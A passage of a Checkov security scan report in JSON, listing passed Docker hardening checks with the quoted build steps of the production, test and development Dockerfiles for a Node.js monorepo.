NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL\n" + ], + [ + 20, + "\n" + ], + [ + 21, + "RUN npm install\n" + ], + [ + 22, + "RUN npm run db:generate\n" + ], + [ + 23, + "RUN npm run build\n" + ], + [ + 24, + "\n" + ], + [ + 25, + "FROM node:20-bookworm AS runner\n" + ], + [ + 26, + "\n" + ], + [ + 27, + "WORKDIR /app\n" + ], + [ + 28, + "\n" + ], + [ + 29, + "ENV NODE_ENV=production\n" + ], + [ + 30, + "\n" + ], + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ], + [ + 32, + "\n" + ], + [ + 33, + "COPY --from=builder /app/package.json /app/package-lock.json /app/turbo.json /app/tsconfig.base.json ./\n" + ], + [ + 34, + "COPY --from=builder /app/node_modules ./node_modules\n" + ], + [ + 35, + "COPY --from=builder /app/apps ./apps\n" + ], + [ + 36, + "COPY --from=builder /app/packages ./packages\n" + ], + [ + 37, + "\n" + ], + [ + 38, + "EXPOSE 3000 3001 3002 4000\n" + ], + [ + 39, + "\n" + ], + [ + 40, + "CMD [\"npm\", \"run\", \"start\", \"--workspace\", \"@rentaldrivego/api\"]" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 1, + 40 + ], + "resource": "/Dockerfile.production.", + "evaluations": null, + "check_class": "checkov.dockerfile.checks.ExposePort22", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-port-22-is-not-exposed", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_DOCKER_10", + "bc_check_id": "BC_DKR_GENERAL_10", + "check_name": "Ensure that WORKDIR values are absolute paths", + "check_result": { + "result": "PASSED", + "results_configuration": null + }, + "code_block": [ + [ + 1, + "FROM node:20-bookworm AS builder\n" + ], + [ + 2, + "\n" + ], + [ + 3, + "WORKDIR /app\n" + ], + [ + 4, + "\n" + ], + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ], + [ + 6, + "\n" + ], + [ + 7, + "COPY package.json package-lock.json turbo.json tsconfig.base.json ./\n" + ], + [ + 8, + "COPY apps ./apps\n" + ], + [ + 9, + "COPY packages ./packages\n" + ], + [ + 10, + "\n" + ], + [ + 11, + "# NEXT_PUBLIC_* vars must be present at build time \u2014 they are inlined into JS bundles\n" + ], + [ + 12, + "ARG NEXT_PUBLIC_API_URL\n" + ], + [ + 13, + "ARG NEXT_PUBLIC_MARKETPLACE_URL\n" + ], + [ + 14, + "ARG NEXT_PUBLIC_DASHBOARD_URL\n" + ], + [ + 15, + "ARG NEXT_PUBLIC_ADMIN_URL\n" + ], + [ + 16, + "ENV NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL \\\n" + ], + [ + 17, + " NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL \\\n" + ], + [ + 18, + " NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL \\\n" + ], + [ + 19, + " NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL\n" + ], + [ + 20, + "\n" + ], + [ + 21, + "RUN npm install\n" + ], + [ + 22, + "RUN npm run db:generate\n" + ], + [ + 23, + "RUN npm run build\n" + ], + [ + 24, + "\n" + ], + [ + 25, + "FROM node:20-bookworm AS runner\n" + ], + [ + 26, + "\n" + ], + [ + 27, + "WORKDIR /app\n" + ], + [ + 28, + "\n" + ], + [ + 29, + "ENV NODE_ENV=production\n" + ], + [ + 30, + "\n" + ], + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ], + [ + 32, + "\n" + ], + [ + 33, + "COPY --from=builder /app/package.json /app/package-lock.json /app/turbo.json /app/tsconfig.base.json ./\n" + ], + [ + 34, + "COPY --from=builder /app/node_modules ./node_modules\n" + ], + [ + 35, + "COPY --from=builder /app/apps ./apps\n" + ], + [ + 36, + "COPY --from=builder /app/packages ./packages\n" + ], + [ + 37, + "\n" + ], + [ + 38, + "EXPOSE 3000 3001 3002 4000\n" + ], + [ + 39, + "\n" + ], + [ + 40, + "CMD [\"npm\", \"run\", \"start\", \"--workspace\", \"@rentaldrivego/api\"]" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 1, + 40 + ], + "resource": "/Dockerfile.production.", + "evaluations": null, + "check_class": "checkov.dockerfile.checks.WorkdirIsAbsolute", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-workdir-values-are-absolute-paths", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_DOCKER_9", + "bc_check_id": "BC_DKR_NETWORKING_1", + "check_name": "Ensure that APT isn't used", + "check_result": { + "result": "PASSED", + "results_configuration": null + }, + "code_block": [ + [ + 1, + "FROM node:20-bookworm\n" + ], + [ + 2, + "\n" + ], + [ + 3, + "WORKDIR /app\n" + ], + [ + 4, + "\n" + ], + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ], + [ + 6, + "\n" + ], + [ + 7, + "COPY package.json package-lock.json turbo.json tsconfig.base.json ./\n" + ], + [ + 8, + "COPY apps ./apps\n" + ], + [ + 9, + "COPY packages ./packages\n" + ], + [ + 10, + "\n" + ], + [ + 11, + "RUN npm install\n" + ], + [ + 12, + "\n" + ], + [ + 13, + "ENV NODE_ENV=test\n" + ], + [ + 14, + "\n" + ], + [ + 15, + "CMD [\"sh\", \"-c\", \"npm run db:deploy && npm run db:generate && npm run type-check && npm run build && npm run test:api:integration\"]" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 1, + 15 + ], + "resource": "/Dockerfile.test.", + "evaluations": null, + "check_class": "checkov.dockerfile.checks.RunUsingAPT", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-is-not-used", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_DOCKER_5", + "bc_check_id": "BC_DKR_4", + "check_name": "Ensure update instructions are not use alone in the Dockerfile", + "check_result": { + "result": "PASSED", + "results_configuration": null + }, + "code_block": [ + [ + 1, + "FROM node:20-bookworm\n" + ], + [ + 2, + "\n" + ], + [ + 3, + "WORKDIR /app\n" + ], + [ + 4, + "\n" + ], + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ], + [ + 6, + "\n" + ], + [ + 7, + "COPY package.json package-lock.json turbo.json tsconfig.base.json ./\n" + ], + [ + 8, + "COPY apps ./apps\n" + ], + [ + 9, + "COPY packages ./packages\n" + ], + [ + 10, + "\n" + ], + [ + 11, + "RUN npm install\n" + ], + [ + 12, + "\n" + ], + [ + 13, + "ENV NODE_ENV=test\n" + ], + [ + 14, + "\n" + ], + [ + 15, + "CMD [\"sh\", \"-c\", \"npm run db:deploy && npm run db:generate && npm run type-check && npm run build && npm run test:api:integration\"]" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 1, + 15 + ], + "resource": "/Dockerfile.test.", + "evaluations": null, + "check_class": "checkov.dockerfile.checks.UpdateNotAlone", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-update-instructions-are-not-used-alone-in-the-dockerfile", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_DOCKER_11", + "bc_check_id": "BC_DKR_GENERAL_9", + "check_name": "Ensure From Alias are unique for multistage builds.", + "check_result": { + "result": "PASSED", + "results_configuration": null + }, + "code_block": [ + [ + 1, + "FROM node:20-bookworm\n" + ], + [ + 2, + "\n" + ], + [ + 3, + "WORKDIR /app\n" + ], + [ + 4, + "\n" + ], + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ], + [ + 6, + "\n" + ], + [ + 7, + "COPY package.json package-lock.json turbo.json tsconfig.base.json ./\n" + ], + [ + 8, + "COPY apps ./apps\n" + ], + [ + 9, + "COPY packages ./packages\n" + ], + [ + 10, + "\n" + ], + [ + 11, + "RUN npm install\n" + ], + [ + 12, + "\n" + ], + [ + 13, + "ENV NODE_ENV=test\n" + ], + [ + 14, + "\n" + ], + [ + 15, + "CMD [\"sh\", \"-c\", \"npm run db:deploy && npm run db:generate && npm run type-check && npm run build && npm run test:api:integration\"]" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 1, + 15 + ], + "resource": "/Dockerfile.test.", + "evaluations": null, + "check_class": "checkov.dockerfile.checks.AliasIsUnique", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-from-alias-is-unique-for-multistage-builds", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_DOCKER_7", + "bc_check_id": "BC_DKR_7", + "check_name": "Ensure the base image uses a non latest version tag", + "check_result": { + "result": "PASSED", + "results_configuration": [ + { + "instruction": "FROM", + "startline": 0, + "endline": 0, + "content": "FROM node:20-bookworm\n", + "value": "node:20-bookworm" + } + ] + }, + "code_block": [ + [ + 1, + "FROM node:20-bookworm\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 1, + 1 + ], + "resource": "/Dockerfile.test.FROM", + "evaluations": null, + "check_class": "checkov.dockerfile.checks.ReferenceLatestTag", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-the-base-image-uses-a-non-latest-version-tag", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_DOCKER_10", + "bc_check_id": "BC_DKR_GENERAL_10", + "check_name": "Ensure that WORKDIR values are absolute paths", + "check_result": { + "result": "PASSED", + "results_configuration": null + }, + "code_block": [ + [ + 1, + "FROM node:20-bookworm\n" + ], + [ + 2, + "\n" + ], + [ + 3, + "WORKDIR /app\n" + ], + [ + 4, + "\n" + ], + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ], + [ + 6, + "\n" + ], + [ + 7, + "COPY package.json package-lock.json turbo.json tsconfig.base.json ./\n" + ], + [ + 8, + "COPY apps ./apps\n" + ], + [ + 9, + "COPY packages ./packages\n" + ], + [ + 10, + "\n" + ], + [ + 11, + "RUN npm install\n" + ], + [ + 12, + "\n" + ], + [ + 13, + "ENV NODE_ENV=test\n" + ], + [ + 14, + "\n" + ], + [ + 15, + "CMD [\"sh\", \"-c\", \"npm run db:deploy && npm run db:generate && npm run type-check && npm run build && npm run test:api:integration\"]" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 1, + 15 + ], + "resource": "/Dockerfile.test.", + "evaluations": null, + "check_class": "checkov.dockerfile.checks.WorkdirIsAbsolute", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-workdir-values-are-absolute-paths", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_DOCKER_9", + "bc_check_id": "BC_DKR_NETWORKING_1", + "check_name": "Ensure that APT isn't used", + "check_result": { + "result": "PASSED", + "results_configuration": null + }, + "code_block": [ + [ + 1, + "FROM node:20-bookworm\n" + ], + [ + 2, + "\n" + ], + [ + 3, + "WORKDIR /app\n" + ], + [ + 4, + "\n" + ], + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ], + [ + 6, + "\n" + ], + [ + 7, + "COPY package.json package-lock.json turbo.json tsconfig.base.json ./\n" + ], + [ + 8, + "COPY apps ./apps\n" + ], + [ + 9, + "COPY packages ./packages\n" + ], + [ + 10, + "\n" + ], + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ], + [ + 12, + "\n" + ], + [ + 13, + "EXPOSE 3000 3001 3002 3003 4000\n" + ], + [ + 14, + "\n" + ], + [ + 15, + "CMD [\"sh\", \"-c\", \"npm run db:generate && npm run dev\"]" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 1, + 15 + ], + "resource": "/Dockerfile.dev.", + "evaluations": null, + "check_class": "checkov.dockerfile.checks.RunUsingAPT", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-is-not-used", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_DOCKER_5", + "bc_check_id": "BC_DKR_4", + "check_name": "Ensure update instructions are not use alone in the Dockerfile", + "check_result": { + "result": "PASSED", + "results_configuration": null + }, + "code_block": [ + [ + 1, + "FROM node:20-bookworm\n" + ], + [ + 2, + "\n" + ], + [ + 3, + "WORKDIR /app\n" + ], + [ + 4, + "\n" + ], + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ], + [ + 6, + "\n" + ], + [ + 7, + "COPY package.json package-lock.json turbo.json tsconfig.base.json ./\n" + ], + [ + 8, + "COPY apps ./apps\n" + ], + [ + 9, + "COPY packages ./packages\n" + ], + [ + 10, + "\n" + ], + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ], + [ + 12, + "\n" + ], + [ + 13, + "EXPOSE 3000 3001 3002 3003 4000\n" + ], + [ + 14, + "\n" + ], + [ + 15, + "CMD [\"sh\", \"-c\", \"npm run db:generate && npm run dev\"]" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 1, + 15 + ], + "resource": "/Dockerfile.dev.", + "evaluations": null, + "check_class": "checkov.dockerfile.checks.UpdateNotAlone", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-update-instructions-are-not-used-alone-in-the-dockerfile", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_DOCKER_11", + "bc_check_id": "BC_DKR_GENERAL_9", + "check_name": "Ensure From Alias are unique for multistage builds.", + "check_result": { + "result": "PASSED", + "results_configuration": null + }, + "code_block": [ + [ + 1, + "FROM node:20-bookworm\n" + ], + [ + 2, + "\n" + ], + [ + 3, + "WORKDIR /app\n" + ], + [ + 4, + "\n" + ], + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ], + [ + 6, + "\n" + ], + [ + 7, + "COPY package.json package-lock.json turbo.json tsconfig.base.json ./\n" + ], + [ + 8, + "COPY apps ./apps\n" + ], + [ + 9, + "COPY packages ./packages\n" + ], + [ + 10, + "\n" + ], + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ], + [ + 12, + "\n" + ], + [ + 13, + "EXPOSE 3000 3001 3002 3003 4000\n" + ], + [ + 14, + "\n" + ], + [ + 15, + "CMD [\"sh\", \"-c\", \"npm run db:generate && npm run dev\"]" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 1, + 15 + ], + "resource": "/Dockerfile.dev.", + "evaluations": null, + "check_class": "checkov.dockerfile.checks.AliasIsUnique", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-from-alias-is-unique-for-multistage-builds", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_DOCKER_7", + "bc_check_id": "BC_DKR_7", + "check_name": "Ensure the base image uses a non latest version tag", + "check_result": { + "result": "PASSED", + "results_configuration": [ + { + "instruction": "FROM", + "startline": 0, + "endline": 0, + "content": "FROM node:20-bookworm\n", + "value": "node:20-bookworm" + } + ] + }, + "code_block": [ + [ + 1, + "FROM node:20-bookworm\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 1, + 1 + ], + "resource": "/Dockerfile.dev.FROM", + "evaluations": null, + "check_class": "checkov.dockerfile.checks.ReferenceLatestTag", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-the-base-image-uses-a-non-latest-version-tag", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_DOCKER_1", + "bc_check_id": "BC_DKR_1", + "check_name": "Ensure port 22 is not exposed", + "check_result": { + "result": "PASSED", + "results_configuration": null + }, + "code_block": [ + [ + 1, + "FROM node:20-bookworm\n" + ], + [ + 2, + "\n" + ], + [ + 3, + "WORKDIR /app\n" + ], + [ + 4, + "\n" + ], + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ], + [ + 6, + "\n" + ], + [ + 7, + "COPY package.json package-lock.json turbo.json tsconfig.base.json ./\n" + ], + [ + 8, + "COPY apps ./apps\n" + ], + [ + 9, + "COPY packages ./packages\n" + ], + [ + 10, + "\n" + ], + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ], + [ + 12, + "\n" + ], + [ + 13, + "EXPOSE 3000 3001 3002 3003 4000\n" + ], + [ + 14, + "\n" + ], + [ + 15, + "CMD [\"sh\", \"-c\", \"npm run db:generate && npm run dev\"]" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 1, + 15 + ], + "resource": "/Dockerfile.dev.", + "evaluations": null, + "check_class": "checkov.dockerfile.checks.ExposePort22", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-port-22-is-not-exposed", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_DOCKER_10", + "bc_check_id": "BC_DKR_GENERAL_10", + "check_name": "Ensure that WORKDIR values are absolute paths", + "check_result": { + "result": "PASSED", + "results_configuration": null + }, + "code_block": [ + [ + 1, + "FROM node:20-bookworm\n" + ], + [ + 2, + "\n" + ], + [ + 3, + "WORKDIR /app\n" + ], + [ + 4, + "\n" + ], + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ], + [ + 6, + "\n" + ], + [ + 7, + "COPY package.json package-lock.json turbo.json tsconfig.base.json ./\n" + ], + [ + 8, + "COPY apps ./apps\n" + ], + [ + 9, + "COPY packages ./packages\n" + ], + [ + 10, + "\n" + ], + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ], + [ + 12, + "\n" + ], + [ + 13, + "EXPOSE 3000 3001 3002 3003 4000\n" + ], + [ + 14, + "\n" + ], + [ + 15, + "CMD [\"sh\", \"-c\", \"npm run db:generate && npm run dev\"]" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 1, + 15 + ], + "resource": "/Dockerfile.dev.", + "evaluations": null, + "check_class": "checkov.dockerfile.checks.WorkdirIsAbsolute", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-workdir-values-are-absolute-paths", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_1", + "bc_check_id": null, + "check_name": "Ensure that sudo isn't used", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "dbd32b6bad6b728919787011f82d60c50d7b2d1c079f814de2b1640696c98816" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-dont-use-sudo", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_1", + "bc_check_id": null, + "check_name": "Ensure that sudo isn't used", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20, + "resource_type": "RUN", + "hash": "6979b14e6a853ac150ffef85c5e28fd49c956054ea2cb1d01440e13b17260c4a" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 21, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 21, + 21 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-dont-use-sudo", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_1", + "bc_check_id": null, + "check_name": "Ensure that sudo isn't used", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21, + "resource_type": "RUN", + "hash": "c1f9cc0c42260bb0183d7e7b9ec2edab99837111ad42dbbdd7fad09ff3e37ab0" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 22, + "RUN npm run db:generate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 22, + 22 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-dont-use-sudo", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_1", + "bc_check_id": null, + "check_name": "Ensure that sudo isn't used", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22, + "resource_type": "RUN", + "hash": "1bf185fb6038f1b491f2a2686de4dd9869ccdd9c3e34d2772cf43bd368377aa6" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 23, + "RUN npm run build\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 23, + 23 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-dont-use-sudo", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_1", + "bc_check_id": null, + "check_name": "Ensure that sudo isn't used", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30, + "resource_type": "RUN", + "hash": "01c88e306f7db45ae7136e3bdb63c4b15978dd024f6ed18210961fc3db3df382" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 